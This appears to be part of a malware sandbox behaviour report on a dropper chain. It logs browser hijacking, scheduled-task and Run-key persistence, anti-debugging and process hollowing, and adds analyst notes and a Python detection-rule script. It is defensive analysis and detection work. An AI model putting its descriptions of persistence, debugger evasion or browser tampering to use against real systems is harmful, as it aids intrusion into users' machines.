| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\54E176903A096E58E807B60E1BDFA85C | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\54E176903A096E58E807B60E1BDFA85C | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
ThreadHideFromDebugger (NtSetInformationThread information class 0x11) stops the calling thread from generating debug events, which blinds an attached debugger. The root sample does it once; it is recorded four times for axplong.exe.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Suspicious use of SetThreadContext
Source and target are the same image (Restructuring.pif, PID 4876 writing the context of PID 456): a fresh copy of itself is started and its main thread is redirected, the usual shape of self-injection or process hollowing. Note the .pif extension: Windows executes a .pif that is really a PE as a normal executable, so the name is cosmetic.
| Description | Indicator | Process | Target |
| PID 4876 set thread context of 456 | N/A | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif |
Drops file in Program Files directory
The Firefox rows are an install-tampering pattern rather than an update: TFXDRjP.exe backs up omni.ja (the packed resource archive of the browser) to omni.ja.bak, rewrites omni.ja, and drops an .xpi into browser\features\, the directory Firefox loads system add-ons from without asking the user. Together with the Chrome manifest.json written under Extensions\agcghmjnenlfcjmnldooeaadankclolo above, this is a browser hijack covering both browsers. The wpamon.exe write is the payload referenced by the WPA Monitor Run key.
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\WPA Monitor\wpamon.exe | C:\Users\Admin\AppData\Local\Temp\1000147001\nano.exe | N/A |
| File created | C:\Program Files (x86)\xFHhRZnoU\rvmgQR.dll | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| File created | C:\Program Files (x86)\WPA Monitor\wpamon.exe | C:\Users\Admin\AppData\Local\Temp\1000147001\nano.exe | N/A |
Drops file in Windows directory
Two of the .job files (axplong.job from the root sample, Hkbsse.job from build2.exe) are written straight into C:\Windows\Tasks by the payloads themselves rather than through schtasks.exe, so a detection keyed only on schtasks.exe command lines misses them; file creation in C:\Windows\Tasks needs to be watched as well.
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\ConfiguringUps | C:\Users\Admin\AppData\Local\Temp\1000132001\runtime.exe | N/A |
| File created | C:\Windows\Tasks\axplong.job | C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe | N/A |
| File opened for modification | C:\Windows\EquationExplorer | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| File opened for modification | C:\Windows\ConfiguringUps | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| File opened for modification | C:\Windows\EquationExplorer | C:\Users\Admin\AppData\Local\Temp\1000132001\runtime.exe | N/A |
| File opened for modification | C:\Windows\SysOrleans | C:\Users\Admin\AppData\Local\Temp\1000132001\runtime.exe | N/A |
| File opened for modification | C:\Windows\HostelGalleries | C:\Users\Admin\AppData\Local\Temp\1000132001\runtime.exe | N/A |
| File opened for modification | C:\Windows\ExplorerProprietary | C:\Users\Admin\AppData\Local\Temp\1000132001\runtime.exe | N/A |
| File created | C:\Windows\Tasks\bPUvzXzfJRZdhTmsKY.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\ChestAntique | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| File opened for modification | C:\Windows\SysOrleans | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| File opened for modification | C:\Windows\ExplorerProprietary | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| File created | C:\Windows\Tasks\XsUoLYLFLViNzfg.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\HostelGalleries | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| File created | C:\Windows\Tasks\Hkbsse.job | C:\Users\Admin\AppData\Local\Temp\1000142101\build2.exe | N/A |
| File created | C:\Windows\Tasks\XvjVthUohNRwdLXcW.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\TreeProfessor | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| File opened for modification | C:\Windows\ChestAntique | C:\Users\Admin\AppData\Local\Temp\1000132001\runtime.exe | N/A |
| File opened for modification | C:\Windows\TreeProfessor | C:\Users\Admin\AppData\Local\Temp\1000132001\runtime.exe | N/A |
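The persistence and browser-tampering rows in the sections above (the MindLynx.url dropped in the Startup folder, the WPA Monitor Run key, the .job files under C:\Windows\Tasks, the Chrome extension manifest, and the Firefox omni.ja and features\*.xpi writes) translate directly into host-side detection logic. The following Python is an added example, not part of this sandbox report or its vendor's code. It runs a small rule set over Sysmon-style file and registry events; the Event and Finding types, the rule names and the SAMPLE_EVENTS list are constructed here from the rows of this report plus two benign control events, and the scratch-directory heuristic and the browser process allow-lists are assumptions to tune per environment.

```python
"""Flag the persistence and browser-tampering artifacts seen in this report.

Example code written for this page. Input is a list of Sysmon-like events
(file create / file modify / registry value set) with the acting process image.
"""
import re
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Event:
    kind: str        # "file_create", "file_modify" or "reg_set"
    image: str       # full path of the acting process
    target: str      # file path, or registry value path for reg_set
    data: str = ""   # registry data for reg_set, decoded (single backslashes)


@dataclass(frozen=True)
class Finding:
    technique: str
    severity: str
    image: str
    target: str
    note: str


# HKLM or HKCU Run key, with or without the WOW6432Node redirection seen in the report.
RUN_KEY_RE = re.compile(r"\\software\\(?:wow6432node\\)?microsoft\\windows\\currentversion\\run\\", re.I)
STARTUP_RE = re.compile(r"\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\", re.I)
# Legacy Task Scheduler 1.0 job files; written by schtasks.exe or directly by malware.
LEGACY_JOB_RE = re.compile(r"^c:\\windows\\tasks\\[^\\]+\.job$", re.I)
# Chrome extension IDs are 32 letters in the range a-p.
CHROME_EXT_RE = re.compile(r"\\google\\chrome\\user data\\[^\\]+\\extensions\\([a-p]{32})\\", re.I)
FIREFOX_RE = re.compile(
    r"^c:\\program files(?: \(x86\))?\\mozilla firefox\\browser\\(?:features\\[^\\]+\.xpi|omni\.ja)$", re.I)
# Assumption: directories any process can drop into; paths here are treated as untrusted.
SCRATCH_RE = re.compile(r"^c:\\(?:users\\[^\\]+\\appdata\\|windows\\temp\\|programdata\\)", re.I)
# Assumption: processes legitimately allowed to write browser install/profile internals.
FIREFOX_WRITERS = {"firefox.exe", "updater.exe", "maintenanceservice.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def in_scratch(path: str) -> bool:
    return bool(SCRATCH_RE.match(path))


def analyze(events: List[Event]) -> List[Finding]:
    findings: List[Finding] = []
    for ev in events:
        img, t = ev.image, ev.target
        if ev.kind == "reg_set" and RUN_KEY_RE.search(t):
            # Run values are common; flag only when the writer or the payload lives in scratch space.
            if in_scratch(img) or in_scratch(ev.data):
                findings.append(Finding("Run key persistence", "high", img, t,
                                        f"value -> {ev.data}; writer or payload in a scratch directory"))
        elif ev.kind in ("file_create", "file_modify"):
            if ev.kind == "file_create" and STARTUP_RE.search(t):
                findings.append(Finding("Startup folder persistence", "high", img, t,
                                        f"{basename(t)} dropped by {basename(img)}"))
            elif ev.kind == "file_create" and LEGACY_JOB_RE.match(t):
                if basename(img) == "schtasks.exe":
                    findings.append(Finding("Scheduled task (.job via schtasks)", "medium", img, t,
                                            "correlate with the schtasks.exe command line"))
                else:
                    findings.append(Finding("Scheduled task (.job written directly)", "high", img, t,
                                            "no schtasks.exe command line exists to catch this"))
            elif (m := CHROME_EXT_RE.search(t)) and basename(img) != "chrome.exe":
                findings.append(Finding("Chrome extension sideload", "high", img, t,
                                        f"extension id {m.group(1)} written by non-browser process"))
            elif FIREFOX_RE.match(t) and basename(img) not in FIREFOX_WRITERS:
                findings.append(Finding("Firefox install tampering", "high", img, t,
                                        "omni.ja or system add-on written outside an update"))
    return findings


# Constructed from the rows of this report, plus two benign control events (the last two).
_SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe"
_TFX = r"C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe"
SAMPLE_EVENTS = [
    Event("reg_set", r"C:\Users\Admin\AppData\Local\Temp\1000147001\nano.exe",
          r"HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WPA Monitor",
          r"C:\Program Files (x86)\WPA Monitor\wpamon.exe"),
    Event("file_create", r"C:\Windows\SysWOW64\cmd.exe",
          r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url"),
    Event("file_create", _SAMPLE, r"C:\Windows\Tasks\axplong.job"),
    Event("file_create", r"C:\Windows\SysWOW64\schtasks.exe", r"C:\Windows\Tasks\bPUvzXzfJRZdhTmsKY.job"),
    Event("file_create", _TFX,
          r"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json"),
    Event("file_modify", _TFX, r"C:\Program Files\Mozilla Firefox\browser\omni.ja"),
    Event("file_create", _TFX,
          r"C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi"),
    Event("file_create", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
          r"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb\1.0_0\manifest.json"),
    Event("reg_set", r"C:\Program Files\Vendor\setup.exe",
          r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Vendor", r"C:\Program Files\Vendor\vendor.exe"),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.severity:6}] {f.technique}: {f.target}\n         by {f.image}\n         {f.note}")
```

The two control events show the intended trade-off: a Run value and an extension manifest written by installed software in Program Files produce nothing, while the same artifacts written from Temp, Windows\Temp or by cmd.exe are flagged. The direct .job write gets a higher severity than the schtasks.exe one precisely because it leaves no command line behind.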
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
The NLS\Language key is opened by ordinary Windows binaries as part of their startup (cmd.exe, reg.exe, findstr.exe, choice.exe, schtasks.exe and gpupdate.exe all appear below), so the length of this table mostly measures how many helper processes the sample spawned. Treat it as context for the process tree, not as an indicator on its own.
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000147001\nano.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\gpupdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000137101\1111.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000129001\DOC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000129001\DOC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000137101\1111.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000137101\1111.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe | N/A |
Modifies data under HKEY_USERS
Writes under HKEY_USERS\.DEFAULT come from processes running as SYSTEM. The SystemCertificates and Internet Settings\ZoneMap subkeys created by powershell.exe are what the Windows certificate store and WinINet zone code create on first use (typically on the first TLS connection) and are noise. The row worth keeping is TFXDRjP.exe setting BitBucket\Volume\{...}\MaxCapacity, which together with its desktop.ini write under C:\$RECYCLE.BIN\S-1-5-18 shows it was working in the SYSTEM account's recycle bin.
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
